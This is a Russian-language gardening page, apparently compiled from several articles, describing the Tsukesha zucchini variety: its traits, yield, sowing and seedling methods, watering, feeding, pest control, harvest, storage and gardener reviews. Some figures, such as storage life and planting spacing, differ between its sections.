1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Основные характеристики выращивания кабачка цунеша

Кабачок Цукеша

Зеленые, лежкие виды кабачков называют цуккини. Они популярны в кулинарии, имеют приятные вкусовые качества. К этой же категории относят и сорт Цукеша. Много места на участке он не занимает и потому рекомендуется в тех случаях, когда участок под посадку огородных культур небольшой. Кабачок Цукеша и его характеристики будет описан в этой статье.

Описание сорта кабачков Цукеша

Кабачок Цукеша растет компактным кустиком

Цукеша – это скороспелый сорт цуккини. Уже на 41-50 день после появления всходов можно пробовать первый урожай. Выращивается в открытом и закрытом грунте. Растет компактным кустиком. Плетистость минимальная. Листочки не колючие, что станет большим плюсом для молодых хозяюшек.

Плоды цилиндрической формы, весят до 900 г. Средняя длина 35-40 см, диаметр – 12 см. Кожура тоненькая, гладкая, темно-зеленая в светло-салатную крапинку. Мякоть нежная, слегка хрустящая, белого цвета.

Характеристики кабачка Цукеша

Кабачок Цукеша может долго храниться без потери вкусовых качеств

Характеристики сорта говорят по большей части в его пользу. Огородники отмечают, что кабачок сорта Цукеша практически не имеет недостатков.

  • Урожайность в открытом грунте до 8 кг с квадрата. В теплицах она повышается до 12 кг.
  • Плодоношение дружное, продолжительное.
  • Кабачок Цукеша может долго храниться без потери вкусовых качеств. Внешний вид также не портится, если правильно их хранить.
  • Перевозки на большие и малые расстояния возможны без проблем. Этот сорт спокойно реагирует на небольшие механические повреждения и не начинает сразу же гнить, так что для продажи он выгоден.
  • Имеется иммунитет практически ко всем основным заболеваниям, присущим цуккини.

К основным проблемам при выращивании можно отнести кропотливый уход во время плодоношения. Кабачки нужно вовремя срывать, не допускать высыхания земли.

Посадка цуккини Цукеша

Выращивать кабачки Цукеша проще всего семенным методом

Для посадки сорта кабачков Цукеша выбирается плодородный, легкий грунт. Грунтовые воды должны залегать низко, иначе появятся гнили. Хорошими предшественниками будут корнеплоды, томат, лук, бобовые. Выращивать кабачки Цукеша проще всего именно семенным методом. Рассаду делают очень редко, да и проку нет, потому как растение быстро вырастает и дает хороший урожай. В нежарких регионах сорт выращивают в теплицах.

Чтобы получить ранние всходы перед посевом семена замачивают на сутки в жидком удобрении. Это может быть настой золы или раствор из стимулятора роста «Энерген», «Иммуноцитофит» или подобных. После этого семена на 2 дня укутывают в мокрую бумажную салфетку, время от времени проветривая и смачивая. Держат их при температуре +22 градуса.

Посев семян на постоянное место проводят примерно в конце мая и до начала июня – уже после того, как пройдут возвратные морозы. Если сеять в теплице, то можно и с апреля. Семена всегда сеют в лунки по 2-3 штучки, потому как всхожесть не всегда радует. Глубина посева до 5 см. Расстояние между лунками 60 см в среднем. Сажают обычно в шахматном порядке, чтобы сэкономить место. После того как появятся всходы, все хилые ростки удаляют. В каждой лунке должно остаться по 1 ростку.

Уход за посадками

Удобрения для кабачков Цукеша

Большой урожай цуккини возможен только при правильном уходе, это касается и кабачков сорта Цукеша.

  • Полив проводят по мере высыхания грунта. Обычно это раз в 5-7 дней. Если климат влажный, то можно и сократить полив, а если сухой – участить.
  • Рыхление земли проводят на следующий день после вечернего полива, или вечером, после утреннего.
  • Сорняки собирают по мере их появления. Если трудно вырывать мелкие сорняки, можно подождать немного пока они подрастут, тогда будет виднее и проще. И все же затягивать с этой процедурой нельзя!
  • Подкормки проводят по мере необходимости. Вообще кабачки – это одна из немногих культур, которые можно вообще не подкармливать. Они растут быстро, дают хорошие урожаи без серьезных подкормок. Главное сажать их в плодородный грунт. Если же растет культура медленно, можно ее подкормить минералами («Нитрофоска», «Эффектон», «Бутон») или внести настой золы, трав.
  • При появлении болезней стоит опрыскать кустики препаратом «Топсин-М», «Топаз» или «Изофен». Если на культуре начали селиться вредители, также проводится обработка, но уже другими препаратами: «Кельтан», «Искра», «Карбофос», «Трифос». Можно также воспользоваться народными рецептами (солевой, чесночный раствор, зола).

Сбор и хранение урожая

Что можно приготовить из урожая кабачков Цукеша

Кабачки сорта Цукеша дают урожай с конца июня по август. Сбор кабачков Цукеша можно начинать уже с того момента, когда они станут нормального размера – около 35 см или даже раньше. Срывать их нужно по мере созревания, чтобы стимулировать развитие новых плодов. Небольшие цуккини очень вкусные, имеют тонкую кожуру, мягкую, поэтому годятся для любого блюда. Их часто даже консервируют в цельном виде.

После сбора урожай кладут в холодильник, холодильную камеру или на крайний случай, в погреб. Хранятся кабачки этого сорта до месяца, но только если после сбора их не мыть. Сорт отличается прекрасными вкусовыми характеристиками. Его используют для приготовления самых разнообразных блюд, от свежих салатов до консервации. Очень вкусные получаются из него запеченные кабачки. Нередко кабачки Цукеша также используются в приготовлении разных настоев, полезных масок для кожи.

Отзывы о кабачках Цукеша

Ниже приведены отзывы огородников, которые уже пробовали выращивать кабачки Цукеша.

  • Виктор Донцов: «Путем проб и ошибок открыл для себя сорт Цукеша. Эти кабачки как по мне лучшие и для хранения, и вообще на вкус. Очень нежные, для разных блюд подходят. Часть урожая всегда закрываем в баночках, для этого берем только самые маленькие цуккини. Остальные для салатов и жарки используем.
  • Мария Иванова: «Сорт кабачков Цукеша на зависть соседям, но заметила, что покупать их нужно только в проверенных местах, иначе можно на подделку попасть. Один раз так вообще, не кустами росли, а плелись по всему огороду».
  • Николай Ващенко: «Не только плоды Цукеша, но и цветы моя семья очень любит. Жарим их в кляре – очень вкусно. Немного закрываем в банках, кружочками, на зиму. А вообще сорт хороший, простой в выращивании, даже без удобрений растет быстро».

Кабачок цуккини Цукеша

По мнению огородников, кабачки можно назвать самым благодарным овощем. При минимальном уходе растения дают отличный урожай вкусных плодов. Кабачок «Цукеша» относится к группе цуккини. Эта разновидность кабачков характеризуется хорошей лежкостью. Цуккини имеют зеленую окраску разных оттенков, чем внешне резко отличаются от белоплодных кабачков.

Проблем с выращиванием кабачка цуккини «Цукеша» почти не бывает, а отдача культуры очень высокая. Растет сорт кабачка в любых регионах России – на юге и севере, в Сибири и на Урале, на Дальнем Востоке и в средней полосе.

Польза и описание

Кабачок «Цукеша» привлекает внимание огородников своими питательными свойствами и универсальностью применения. Больше всего ценится его низкая калорийность и состав полезных веществ. В 100 г мякоти кабачка «Цукеша» содержится 23 ккал, что позволяет употреблять «Цукешу» в рационе диетического питания. Плоды богаты полезными кислотами – фолиевой, никотиновой, яблочной и содержит целый спектр витаминов.

Кроме этого, в сорте кабачков «Цукеша» есть важные для организма микроэлементы:

  • цинк;
  • молибден;
  • литий;
  • магний;
  • кальций;
  • калий и другие полезные компоненты.

Еще одна причина популярности сорта «Цукеша» – универсальность использования в кулинарии. Рецептов блюд такое множество, что порой невозможно сделать выбор лучшего. «Цукеша» обладает приятным вкусом, поэтому и консервированные блюда становятся насыщеннее, если добавить в заготовку кабачок.

Огородникам важно знать основные характеристики кабачка «Цукеша», и насколько полученный результат соответствует описанию сорта.

Вначале следует сказать о параметрах растения. «Цукеша» – кустовой кабачок без плетей, растет компактно и места много не занимает. Поэтому даже на небольших участках вы можете без ущерба для других культур выделить место для 3-4 кустов «Цукеши». А это значит, что плодов хватит не только для лета, но и на зиму.

В конце периода хранения:

  • кабачки становятся более грубыми;
  • внутри плода образуется пустота;
  • трудно очищается кожура.

По отзывам дачников, кабачок цуккини «Цукеша» хорошо сохраняет свои качества в течение 2-3 месяцев после уборки урожая.

Плодоношение длится долго, до заморозков. Особенностью сорта является необходимость регулярно собирать плоды. В этом случае очень быстро образуются новые. Если не давать кабачкам «Цукеша» вырастать до огромных размеров, то количество новых завязей значительно увеличится.

Урожайность сорта «Цукеша» высокая. С 1 кв. м площади посадок по описанию сорта, можно собирать от 8 до 12 кг кабачков «Цукеша». А реальный результат зависит от условий выращивания и качества ухода за растениями. По отзывам, тщательное соблюдение несложных требований агротехники увеличивает урожайность кабачка «Цукеша» в несколько раз (см. фото).

Плоды кабачков «Цукеша» в течение периода вегетации меняют свою окраску. Молодые окрашены в темно-зеленый цвет, а затем покрываются салатовыми крапинами. В стадии зрелости желтеют, некоторые приобретают оранжевый оттенок. Размер одного кабачка «Цукеша» колеблется от 30 до 40 см, вес крупных экземпляров достигает 900 г. Кожица у кабачков нежная, мякоть вкусная и сочная. Зеленцы размером до 20 см еще не имеют внутри сформированных семян, при разделке их от сердцевины не очищают.

Завязи образуются под розеткой, поэтому кусты очень компактные.

Листья крупные. У листьев кабачка «Цукеша» на темно-зеленом фоне расположены белые пятна (см. фото).

Это не проявление заболевания, а сортовая особенность.

Цветы тоже крупные и яркие.

На одном растении есть женские и мужские.
Срок созревания кабачка – ранний. Первые плоды уже готовы к употреблению через 45-50 дней после появления ростков. Чем чаще происходит сбор кабачков, тем больше новых завязей образует куст.

Кабачки «Цукеша» отлично переносят транспортировку, о чем свидетельствуют отзывы дачников и фермеров.

Более наглядно на видео:

Особенности выращивания

Сорт кабачков «Цукеша» выращивают двумя способами. Чаще всего семена просто сеют в грунт при наступлении подходящих погодных условий. Но в северных регионах, и когда хочется получить пораньше вкусные зеленцы, выращивают рассаду.

Прежде чем приступать к посеву в почву, выбирают место с учетом требований севооборота.

Поздняя капуста тоже не лучший предшественник для кабачков «Цукеша». Хорошо растет сорт на грядах, где выращивались картофель, чеснок или лук, бобовые или ранняя капуста.

Скороспелый сорт цуккини высевают сразу в грунт, когда пройдет угроза возвратных заморозков и прогреется почва. Холод «Цукеше» вреден. В холодной земле семена не взойдут. Еще одно требование кабачка – подготовленный грунт:

  1. На торфяник вносят суглинок, компост или перегной.
  2. В песчаную почву добавляют часть дерновой земли, торф, немного перегноя и древесных опилок.
  3. Для суглинка и глинистого грунта понадобится обогащение торфом, песком, перегноем и опилками.

Дополнительно землю перекапывают, вносят удобрения (мочевину 50 г/кв. м) и золу (0,5 л). Некоторые огородники практикуют выращивание кабачков «Цукеша» на компостных кучах. Сверху кучи насыпают небольшой слой земли (30 см) и сеют семена. Сорт кабачков хорошо растет и одновременно декорирует будущее удобрение. При этом важно, чтобы куча располагалась на солнечном месте без застоя воды и не была навозной. Свежий навоз для кабачков недопустим.

Посев в грунт

Семена кабачков «Цукеша» нужно подготовить к посеву, особенно если год сбора их неизвестен.

Самый простой способ – прорастить их во влажной ткани. Можно добавить в воду гумат натрия или калия. Проращивают семена кабачков до появления наклюнувшихся ростков. Более длинные можно сломать в момент посадки. Затем помещают наклюнувшиеся семена в холодильник на сутки. Такой закаливающий прием повысит устойчивость кабачка «Цукеша» к погодным колебаниям. Это важно в регионах Сибири и Урала.

Схема посадки семян кабачков «Цукеша» – 50 см х 70 см.

Опытные овощеводы в одну лунку кладут по 2 семени. Так можно быть уверенным, что в лунке обязательно появятся всходы. Лунку готовят диаметром 20 см и делают бортик. Семена кабачка цуккини «Цукеша» заглубляют на 3 см, накрывают слоем почвы и поливают. Сразу укладывают в лунку слой мульчи, которая предохранит влагу от испарения. С мульчей до появления ростков полив не нужен.

Подробнее о посадке на видео:

Оптимальная температура, при которой кабачки «Цукеша» хорошо развиваются равна +25°С. Поэтому овощеводы накрывают посевы пленкой или пластиковыми бутылками, чтобы создать подходящие условия.

Выращивание рассады

Рассаду кабачков цуккини выращивать несложно.

Саженцы отлично растут в покупном грунте для рассады овощей или в смеси торфа с перегноем. Для посадочной тары берут пластиковые стаканчики или контейнеры. Обязательно делают дренажные отверстия.

Наполняют емкости почвой, которую затем увлажняют. Заглубляют семена «Цукеши» на 2 см и накрывают тару пленкой. Маленькие стаканчики устанавливают в большой ящик, чтобы рассаду кабачков можно было легко переносить. Условия для хорошего развития рассады кабачка цуккини «Цукеша»:

  • температура 18°С-24°С;
  • влажность 70%;
  • полив – один раз в неделю;
  • снижение температуры до 20°С при появлении первого листика;
  • подкармливание 2-3 раза за время выращивания.

О подкормках рассады нужно сказать подробнее. Согласно описанию сорта и отзывам огородников, график подкармливания саженцев кабачков «Цукеша» должен быть таким:

  1. Спустя неделю после прорастания семян.
  2. Через 10 дней после первой подкормки.

Подойдут препараты «Бутон» (2 г), «Эффектон» (1 ч. л.) или нитрофоска. На одно растение достаточно 0,5 – 1 стакана раствора. В фазе 4 листьев рассаду кабачков «Цукеша» высаживают в грунт.

Уход за взрослыми растениями

Уход за кабачками «Цукеша» состоит из традиционных пунктов для овощей. Но есть небольшая особенность. Растение имеет большие листья, под которыми всегда прохладно, сыро и темно. Из-за этого завязи иногда загнивают.

Кабачку нужен грамотный уход:

  1. Полив. Воды культура поглощает много. Сорт «Цукеша» завязывает большое количество плодов, куст растет с объемной зеленой массой. Чтобы не навредить, застилайте почву под кустом сухой травой или соломой. Молоденькие зеленцы не будут касаться земли и останутся целыми. Поливайте только под корень и по необходимости. Орошение листьев допустимо в жаркие засушливые периоды. На одно растение нужно 10 литров воды. Старайтесь не поливать кабачки «Цукеша» холодной водой.
  2. Прореживание листвы. Важное мероприятие при выращивании кабачков «Цукеша». Листья, которые ложатся на почву, вырезают секатором. Допустимо за одну обрезку удалить 2-3 листа. Поэтому процедуру повторяют регулярно. Этот прием не только улучшает освещенность и проветриваемость куста, но и позволяет пчелам легче находить цветки.
  3. Подкармливание. При выращивании на компостных кучах или на почве, заранее хорошо удобренной, подкармливать кабачки сорта «Цукеша» необязательно. Если земля скудная или удобрения не вносились, то подкармливают кусты органикой. Плоды «Цукеши» растут быстро, поэтому химические вещества лучше не использовать. Иначе придется принимать их в пищу. По отзывам огородников, для кабачка «Цукеша» лучше всего подходит настой трав, подготовленный как на фото.

    Настаивают рубленую зелень 1-2 недели, затем на садовую лейку воды добавляют 2 литра настоя и поливают кабачки. Еще одно «любимое» кабачками средство – настой птичьего помета или коровяка. Обязательно любую подкормку сочетают с поливом, а в конце процедуры обмывают листья чистой водой. Первый раз кормят растения в фазе 4 листиков, затем в момент цветения. Следующие подкормки делают каждые 2 недели.
  4. Сбор плодов. Проводят регулярно, чтобы новые завязи образовывались постоянно. Те кабачки, которые планируется оставить на хранение, не убирают с гряд до образования плотной кожуры.

Среди вредителей для кабачков «Цукеша» опасность представляют слизни, паутинный клеш и ростковая муха. При обнаружении паразитов, используют золу древесную, настой луковой шелухи, чеснока или химические препараты («Искра», карбофос, «Интавир»).

Кабачок может поражаться мучнистой росой. Чтобы предотвратить появление проблем, нужно тщательно выполнять требования агротехники:

  • соблюдать севооборот;
  • обеспечивать проветриваемость и оптимальное освещение;
  • не допускать переливов;
  • регулярно осматривать кусты.

В этом случае кабачок «Цукеша» на участке будет точно соответствовать фото и описанию.

С кабачком «Цукеша» урожай всегда на высоте

Кабачки – скороспелая, диетическая и вкусная разновидность тыквы. Культура отличается разнообразием сортов и видов. Цуккини – кабачок с зеленой окраской кожуры. Особенностью вида являются любовь к теплу, высокое содержание витамина C и нежный вкус. Среди популярных сортов выделяется кабачок «Цукеша». Культура раннеспелая, кустовая, с высокой урожайностью.

Характеристика и описание сорта

Кабачки сорта «Цукеша» являются однолетней овощной культурой. Форма растения кустовая, листья крупные, жесткие, рассеченные, зеленого цвета. Корень стержневой, разветвленный. Розетка компактная, занимает немного места на огороде. Цветы одиночные, оранжевые, однополые. Для формирования плодов, которые называют тыквины, необходимо опыление. Его выполняют насекомые (пчелы, осы, шмели), привлеченные яркой окраской цветов.

Плоды цилиндрические, с рифленой поверхностью, на фото видно, что тыквины несколько сужаются в области плодоножки. Кора тонкая, глянцевая. В период технической спелости тыквины темно-зеленые со светло-зелеными крапинками. К моменту биологического созревания они приобретают медный оттенок. Кора становится жестче. Мякоть белая, нежная и сочная. Благодаря упругости заменяет хрустящие огурцы. Вкусовые качества отличные. Плоды крупные, их длина достигает 25-40 см, вес 800 г.

Информация. Женские цветы легко отличить от мужских по короткой цветоножке.

Семенное гнездо кабачка кремового цвета. Семена небольшие, созревают поздно. Их длина 1-3 см, по краю ободок. Оболочка твердая, белая. В мякоти содержится 94% воды, 5% углеводов, 0,6% белков. Овощ богат минеральными веществами: фосфор, железо, калий. Он содержит легко усваиваемую растительную клетчатку и большое количество витаминов: C, PP, B6, B2. Кабачки «Цукеша» относятся к диетическим продуктам, рекомендованных для питания детей и пожилых людей.

Разновидности тыквенных культур

При классификации кабачков их делят на две группы: белокорые сорта и цуккини. Вторая группа отличается зеленой или желтой окраской плодов. Цуккини, к которым относится сорт «Цукеша» имеют несколько преимуществ:

  • Тонкая кожица, не требующая срезания при кулинарной обработке.
  • Отменный вкус, позволяющий употреблять плоды в сыром виде.
  • Высокая урожайность, «Цукеша» дает до 12 кг кабачков с одного куста.
  • Большое количество женских цветов.

Первые сорта цуккини отличались низкой устойчивостью к холоду, что ограничивало географию их выращивание. Разработки селекционеров улучшили характеристики растения. Кабачок «Цукеша» выведен на российской опытной станции. Он рекомендован к выращиванию в Центральном, Средневолжском и Дальневосточном регионе. Культура раннеспелая, от всходов до первых тыквин проходит около 50 дней. Молодые овощи используют для салатов, приготовления рагу, жарки и консервации.

Подробности сравнения различных видов тыквенной культуры в статье «Цукини и кабачки – в чем же разница?».

Сорт «Цукеша» очень популярен среди огородников благодаря высокой урожайности. При своевременном срезании плодов регулярно завязываются новые тыквины. Период плодоношения растягивается до первых холодов. Тыквины имеют отличный товарный вид, без потерь переносят длительную транспортировку. Культура устойчива к основным болезням кабачков: мучнистой росе и антракнозу. Опасность для овоща представляет серая гниль, возникающая при поливе растения холодной водой и избыточной влажности. Для борьбы с грибком используется препарат «Фитолавин», выполняется подкормка настоем золы.

Посадка и уход за цуккини

Лучшим местом для посадки кабачков будет хорошо освещенный, защищенный от ветра участок. Следует учесть предшественников овоща. Правильный севооборот является одним из факторов обильного урожая. Цуккини хорошо растут после лука, картофеля, свеклы, томатов и бобовых. Нельзя сажать кабачки после других тыквенных культур – тыквы, патиссонов. Растения имеют общие болезни, потребляют из почвы одинаковые микроэлементы.

Для посадки подходят суглинистые, рыхлые почвы с низкой кислотностью. Чтобы получить большой урожай, необходимо заранее внести в землю органические и минеральные удобрения. Опытные огородники готовят грядки под кабачки «Цукеша» еще с осени. Землю перекапывают, удаляют корни сорняков. Чтобы повысить плодородность на каждый кв. м высыпают ведро перегноя или компоста, 200 г древесной золы, 20 г комплексного удобрения «Нитрофоска» или 50 г мочевины.

Информация. Улучшить структуру почвы и повысить плодородность можно с помощью сидератов. К таким культурам относятся: овес, горчица, бобовые, ячмень. Заделка в грунт зеленой массы насыщает его фосфором, калием и азотом. Повышается рыхлость почвы, заглушаются сорняки.

Выращивание кабачков «Цукеша»

Овощи рекомендуются для выращивания в теплице и открытом грунте. На огороде кабачки высаживают семенами или рассадой. Второй вариант оптимален для регионов с коротким летом и сложными климатическими условиями. Перед посадкой семенной материал замачивают в воде со стимулятором роста. Проросшие семена дают больше шансов на хороший урожай. Чтобы предотвратить грибковые инфекции кабачки обрабатывают раствором марганцовки или фунгицида.

Начало сева зависит от погодных условий, необходимо дождаться пока среднесуточный показатель температуры остановится на отметке +15°C. Теплолюбивые цуккини прорастают в почве, нагретой до + 12-14°C. Если земля холодная развитие останавливается, семена загнивают. Высадка кабачков в открытый грунт происходит в конце мая или начале июня. Когда погодные условия неблагоприятные, сев лучше отложить до середины или конца первого летнего месяца.

Совет. Аграрии давно заметили влияние луны на растения. Время посадки кабачков «Цукеша» они сверяют с лунным календарем, где отмечены удачные дни.

Участок под кабачки размечают по схеме 60×60 см или 70×70 см. Кусты не должны затенять друг друга и конкурировать за питание. В каждую лунку наливается теплая вода, кладется горсть перегноя и золы. Семена укладываются по 2-3 штуки, если прорастают все, то от слабых саженцев избавляются. При угрозе возвратных заморозков грядку накрывают черной пленкой или нетканым материалом. Некоторые огородники не убирают укрытие, после всходов проделывают в нем отверстия. Участок весь сезон находится под пленкой. Плюс такого метода сохранение влаги в почве. Молодые кабачки нуждаются в уходе:

  • Полив раз в неделю теплой водой, расход до цветения 5 л, во время формирования завязи 10 л.
  • Подкормка – первая происходит спустя 2 недели после всходов. Вносится органика: коровяк, разведенный с водой 1:10, куриный помет (1:15) или настой зеленой ботвы. Пред цветением растение нуждается в комплексном минеральном удобрении. Во время роста тыквин подкармливают золой и готовыми составами «Кемира», «Биогумус». Подойдет раствор суперфосфатов и калия (50 г на 10 л воды).
  • Прополка, обрезка листьев, затеняющих цветы и плоды.
  • Мульчирование почвы – аграрии настоятельно советуют мульчировать кабачки. Перегной или торф на поверхности земли сохраняет влагу, мешает развитию сорняков.

Внимание. Цветы кабачка легко скрещиваются с близкими культурами – патиссонами и тыквами. Следует высаживать растения на значительном расстоянии друг от друга.

Особенности посадки сорта «Цукеша» рассадой

Срок, подходящий для выращивания рассады, 20 апреля -10 мая. Под саженцы готовят отдельные емкости. Можно выбрать любые подручные материалы: пластиковые стаканчики, пустые пакеты от молока. Существуют и специальные емкости, не требующие последующей пересадки растения — это торфяные горшочки. Рассаду выращивают в субстрате, состоящем из нескольких компонентов:

  • торф – основа почвы;
  • опилки;
  • перегной;
  • дерновая земля.

При смешивании компонентов получается легкая, рыхлая и плодородная почва. Семена предварительно замачивают, до прорастания тонких белых корешков их держат во влажной салфетке.

Информация. Сорт «Цукеша» характеризуется хорошей всхожестью, но лучше обратить внимание на срок годности семян. При посадке собственного материала проблем не возникает.

Глубина посадки семян составляет 2-3 см, емкости сверху накрывают полиэтиленовым пакетом для создания тепличных условий. Всходы появляются через 5-7 дней при температуре в помещении 25-26° С. Со стаканчиков убирают пленку и переносят их в светлое место. Температуру понижают до 20-22°C в дневное время и 15-17°C ночью.

Внимание. Несоблюдение режима освещения и температуры приводит к чрезмерному вытягиванию рассады.

Уход за саженцами заключается в поливе по мере высыхания почвы. Вода должна быть теплая и отстоянная. Рассада выращивается 25-30 дней, за это время ее 2 раза подкармливают. Спустя 10 дней после всходов вносят органику или жидкое удобрение «Бутон». Спустя неделю подкармливают минеральными препаратами (суперфосфаты, азот). Подросшие кабачки выносят на открытый балкон или во двор на несколько часов для закаливания. Когда появятся 4 настоящих листика, рассаду пересаживают в открытый грунт.

Для работы выбирают хмурый день, саженцы помещают в лунки с комом земли на корнях. До наступления стойкого тепла их накрывают пленкой, закрепленной на дугах. Спустя месяц кабачки зацветут, а через 7-10 дней появятся молочные тыквины.

Срезанные плоды рекомендуется хранить в холодильнике. Чтобы они лежали долго и не портились, следует отрезать кабачок с длинной плодоножкой до 5 см. Собирают тыквины в сухую погоду, влага на поверхности овощей вызывает загнивание. Сорт «Цукеша» знаком огородникам более 30 лет. Ежегодно он находит новых поклонников необыкновенно нежного и приятного вкуса.

Кабачок Цукеша

Кабачок Цукеша является ранним излюбленным овощем на столе. Тыквенную культуру жарят, варят, используют в разных кулинарных блюдах. Вырастить урожай кабачков под силу даже начинающему огороднику. Сорт Цукеша завалит урожаем, надо только придерживаться несложных правил культивации культуры.

Описание кабачка Цукеша

По своей принадлежности сорт кабачков Цукеша относится к семейству цукини. Родиной овоща является Украина. В Госсреестре тыквенная культура обозначена с 86 года прошлого столетия. Культивировать Цукешу можно во всех регионах с умеренным климатом.

Сорт считается раннеспелый. Уборка первого урожая припадает примерно на 50 сутки. Кабачок выращивают на открытых грядках или под пленкой. Если в теплице есть лишнее место, можно вырастить сверхранний урожай. Раннеспелый сорт выращивают рассадой или сеют семена прямо в грунт.

Сорт Цукеша характеризуется наличием компактного куста. Стебель один короткий, не стелется по земле, занимает маленький участок на огороде. Боковых плетей нет. Кусты настолько компактные, что их можно выращивать на самых маленьких дачах с ограниченным участком земли.

Кустовое растение разращивает крупные пятипалые листья. Каждая лопасть листовой пластины разделена. На поверхности листа присутствует узор в виде набора серых пятен. Рисунок не является проявлением заболевания, а всего лишь характерный сорту признак. Листовая пластина жесткая, но на ощупь колючки не ощущаются. Цветки у сорта Цукеши крупные. Краешки лепестков желтые, а ближе к основанию имеют светлый оттенок. Растение образует обоеполые цветки мужского и женского типа. Если весной плохая погода помешает облету пчел и снизит активность других насекомых, опыление все равно произойдет.

Плодоносит кабачок цуккини Цукеша дружно. Плоды появляются в конце июня и регулярно завязываются до конца августа. Урожай надо собирать вовремя. Кабачки не перезревают, но тянут из растения лишние соки, тем самым затормаживая рост новой завязи. Перезревший овощ не утрачивает свои первозданные качества. У кабачка только меняется зеленый окрас кожицы на желтый цвет.

Описание плодов

Отличительной чертой сорта Цукеша является зеленый цвет кожицы овоща, что характерно для цукини. По мере созревания кабачка на поверхности появляется рисунок в виде продолговатых мелких вкраплений светло-зеленого цвета. Если по кабачку провести рукой, можно ощутить гладкость кожицы.

Форма овоща цилиндрическая, вытянутая. Толщина на всем протяжении одинаковая – около 12 см. Сужение наблюдается возле плодоножки. Длина взрослого кабачка достигает 40 см. Стандартный вес – в пределах 900 г. Изредка могут вырасти экземпляры массой более 1 кг. На стадии молочной зрелости овощ готов к употреблению, когда его длина достигнет 15 см. Вес молоденького кабачка не превышает 200 г.

Кожица кабачка Цукеша тонкая, не грубая и остается такой же даже у перезрелого цукини. Цвет мякоти белый с легким зеленым оттенком. Пустот не образуется. Зерна в молодом виде не грубые, расположены в маленьких семенных камерах. В сыром виде мякоть обладает характерным хрустом. Несмотря на то, что кожица нежная, она одновременно прочная. За счет таких качеств урожай способен сохраняться до 7 месяцев и транспортироваться на дальние расстояния.

Характеристики сорта

Чтобы узнать, насколько хорош овощ, стоит подробнее рассмотреть описание кабачков сорта Цукеша, а начать лучше с урожайности.

Урожайность кабачка сорта Цукеша

У сорта Цукеша, как и у всех цукини, характерен высокий показатель урожайности. Иногда он в 4 раза больше, если сравнивать с простыми белыми кабачками. При нормальном уходе и благоприятных погодных условиях с участка площадью 1 м 2 собирают до 12 кг урожая.

Область применения плодов

Цукини Цукеша настолько нежные и вкусные, что их можно есть даже без предварительной термообработки. Для приготовления овоща существуют сотни рецептов. Кабачки жарят, варят, маринуют, используют сырые в салате, детям пекут оладьи. Сорт Цукеша идет на консервацию. Кабачки закатывают в банке кружочками или ломтиками.

Устойчивость к заболеваниям и вредителям

По отзывам кабачок Цукеша практически не склонен к поражению серой гнилью. Тыквенная культура наделена отличным иммунитетом. На кустах не задерживаются вредители. Характерные для кабачков заболевания могут проявиться только в случае эпидемии.

Достоинства и недостатки сорта

Даже на фото кабачок Цукеша выглядит презентабельно, что говорит о многих преимуществах сорта:

  • высокий показатель урожайности среди категории цукини и по сравнению с сортами белых кабачков;
  • раннее созревание кабачков позволяет быстрее восполнить недостающий рацион овощей на столе;
  • нежная мякоть не грубеет даже после перерастания овоща;
  • мягкие мелкие семена;
  • кустовое растение сорта Цукеша занимает мало места на грядке;
  • урожай поддается длительному хранению и перевозкам;
  • кабачки считаются универсального предназначения, что позволяет использовать овощ во многих блюдах и зимних заготовках.

Из отрицательных качеств сорта Цукеши можно выделить требовательность сорта к регулярным поливам и солнцу. Растение плохо приживается при пересадке. Семена лучше сеять на постоянное место.

Особенности посадки и ухода

Технология выращивания кабачков Цукеша подразумевает использование рассадного способа и семенами в грунт.

При любом способе выращивания сорта Цукеша сначала для кабачков надо правильно подготовить грядку. Оптимально весной организовать парник. Под пленку насыпают компост, перемешанный в равной пропорции с навозом. Сверху органику засыпают черноземом толщиной 30 см. Все содержимое грядки обильно поливают кипятком. Примерно сутки грядка под пленкой будет парить. На второй день измеряют температуру. Приступать к посеву или высадке рассады кабачков Цукеша можно, когда в земле будет не более 15 о С.

Кабачки Цукеша не любят пересадки, но выращивание рассады позволяет получить к столу более ранние овощи. Посев семян осуществляют в апреле. В качестве тары подойдут торфяные стаканчики. Кабачки не придется пересаживать. Рассаду высаживают в лунки вместе со стаканчиком, что избавляет от травмирования корней.

Технология выращивания сорта Цукеша рассадой состоит из следующих шагов:

  • семена кабачка Цукеша на 3 часа замачивают в теплой воде;
  • торфяные стаканчики заполняют грунтом, увлажняют;
  • в каждый стаканчик на глубину 2 см высевают по 2 семечки;
  • посевы накрывают пленкой;
  • после всходов слабый росток удаляют, оставляя только 1 растение;
  • взрослую рассаду кабачков высаживают на грядку в лунки вместе с торфяным стаканчиком;
  • посадочные ямки обильно поливают, чтобы в сырости торф начал разлагаться на удобрение;
  • лунку с высаженным кабачком Цукеша засыпают грунтом, выполняют сверху еще один полив.

После высадки всех кабачков Цукеша, грядку затеняют на первое время нетканым материалом. Убирают укрытие после адаптации растений к природной среде.

Семенами сорт Цукеша высевают в грунт с последних чисел апреля. Когда компост на грядке перегорит, удаляют пленочное укрытие. Для семян делают углубления до 3 см. Оптимальная схема посева 20х30 см. Кустам кабачков достаточно такого места для полноценного развития. Разложенные семена кабачка Цукеши засыпают рыхлой почвой, поливают, на парник возвращают пленку. Снимают укрытие после появление всходов. Первые дни кабачки на ночь накрывают пленкой для защиты от прохлады.

По отзывам кабачок цуккини Цукеша не требует сложного ухода. После снятия пленочного укрытия земля начнет быстрее высыхать. В этот период кабачки поливают часто, но не обильно. Достаточно поддерживать почву слегка увлажненную. Между поливами обязательно рыхлят грунт. Образовавшая корка препятствует доступу кислорода к корням, и неокрепшее растение может погибнуть.

Сорту Цукеша за сезон достаточно одной подкормки. Во время цветения кабачки под корень поливают раствором органики, состоящим из 1 ведра воды и 1 кг навоза. Перед подкормкой органику замачивают на сутки для брожения.

С появлением первой завязи плоды срывают при достижении длины 15 см. Последующие кабачки будут быстрее завязываться и их можно срывать большего размера.

Подвергнуться заболеванию кабачок сорта Цукеша может по вине огородника или по причине эпидемии, нашествии вредителей.

Самые распространенные варианты:

  • Постоянное переувлажнение грунта и полив холодной водой. Сорт Цукеша реагирует на такие недостатки появлением гнили.
  • Нашествие гусениц, тли. Часто явление наблюдается при игнорировании прополки на сильно заросших травой грядках. Если вредители поселились даже на чистой грядке, пораженные листья обрывают и сжигают. Кабачки сорта Цукеша опрыскивают настоем древесной золы с зубным порошком или отваром жгучего перца.
  • Не по вине человека сорт Цукеша может заболеть бактериозом. Недуг проявляется гнилью завязи или плоды вырастают сморщенные. Простым способом спасения кабачков является опрыскивание насаждений раствором бордоской жидкости. Поврежденные плоды подлежат уничтожению.

